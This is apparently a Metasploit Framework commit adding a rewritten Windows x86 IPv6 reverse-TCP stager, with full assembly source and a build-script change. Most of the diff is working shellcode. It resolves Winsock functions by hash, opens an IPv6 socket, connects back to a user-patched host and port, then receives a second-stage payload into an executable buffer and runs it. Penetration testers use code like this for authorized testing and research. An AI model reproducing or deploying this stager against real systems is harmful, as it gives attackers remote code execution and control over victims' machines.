Merge in a rewritten windows x86 reverse_ipv6_tcp stager (The previous one seems hosed since r6744 due to new host/port offsets[1] but the shellcode blob remained the same after modification[2]) - This new one uses the block_api_call technique, is 37 bytes smaller and can handle arbitrary size stages.

[1] https://dev.metasploit.com/redmine/projects/framework/repository/revisions/6744/diff/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
[2] https://dev.metasploit.com/redmine/projects/framework/repository/revisions/6744/diff/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm

git-svn-id: file:///home/svn/framework3/trunk@12562 4d416f70-5f16-0410-b530-b9f4589650da

external/source/shellcode/windows/x86/build.py

@@ -62,6 +62,8 @@ def xmit( name, dump_ruby=True ):
   xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
   xmit_offset( data, "LEPort", pack( "<H", 4444 ) )         # 4444
   xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
+  xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
+  xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
   xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" )     # hostname filler
   xmit_offset( data, "RetryCounter", "\x6a\x05" )     # socket retry
   xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) )  # Filler

external/source/shellcode/windows/x86/src/block/block_recv.asm

@@ -5,7 +5,7 @@
 ;-----------------------------------------------------------------------------;
 [BITS 32]
 
-; Compatible: block_bind_tcp, block_reverse_tcp
+; Compatible: block_bind_tcp, block_reverse_tcp, block_reverse_ipv6_tcp
 
 ; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
 ; Output: None.

external/source/shellcode/windows/x86/src/block/block_reverse_ipv6_tcp.asm

@@ -0,0 +1,55 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 - Assuming IPv6 is available
+; Version: 1.0 (8 May 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the socket for the connection to the server
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x20C)
+
+reverse_ipv6_tcp:
+
+  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
+  push 0x5F327377        ; ...
+  push esp               ; Push a pointer to the "ws2_32" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "ws2_32" )
+  
+  mov eax, 0x0204        ; EAX > sizeof( struct WSAData )
+  sub esp, eax           ; alloc enough space for the WSAData structure
+  dec eax                ; preserve stack alignment!
+  dec eax                ;
+  push esp               ; push a pointer to this stuct
+  push eax               ; push the wVersionRequested parameter
+  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
+  call ebp               ; WSAStartup( 0x0202, &WSAData );
+  
+  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
+  push eax               ; push null for reserved parameter
+  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
+  push byte 6            ; push IPPROTO_TCP
+  inc eax                ; Increment EAX do it is 1
+  push eax               ; push SOCK_STREAM
+  push byte 23           ; push AF_INET6
+  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
+  call ebp               ; WSASocketA( AF_INET6, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0 );
+  mov edi, eax           ; save the socket for later
+  
+  push byte 28           ; length of the sockaddr_in6 struct
+  call ipv6_connect      ; call over the sockaddr_in6 structure ...pushing its address as a parameter for upcoming connect() call
+                         ; (http://msdn.microsoft.com/en-us/library/ms738664%28VS.85%29.aspx)
+  dw 0x0017              ; sin6_family == AF_INET6
+  dw 0x5C11              ; sin6_port (Patched by user)
+  dd 0x00000000          ; sin6_flowinfo
+  dq 0xBBBBBBBBBBBBBBB1  ; sin6_addr (Patched by user)
+  dq 0xCCCCCCCCCCCCCCC1  ; ...
+  dd 0xAAAAAAA1          ; sin6_scope_id (Patched by user)
+ipv6_connect:            ;
+  push edi               ; the socket
+  push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
+  call ebp               ; connect( s, &sockaddr_in6, 28 );
+  
+  mov esi, esp           ; set ESI to ESP for block_recv compatability
+  

external/source/shellcode/windows/x86/src/stager/stager_reverse_ipv6_tcp_nx.asm

@@ -0,0 +1,21 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 - Assuming IPv6 is available
+; Version: 1.0 (8 May 2011)
+; Size: 298 bytes
+; Build: >build.py stager_reverse_ipv6_tcp_nx
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_ipv6_tcp.asm"
+  ; By here we will have performed the reverse_ipv6_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv.asm"
+  ; By now we will have received in the second stage into a RWX buffer and be executing it
+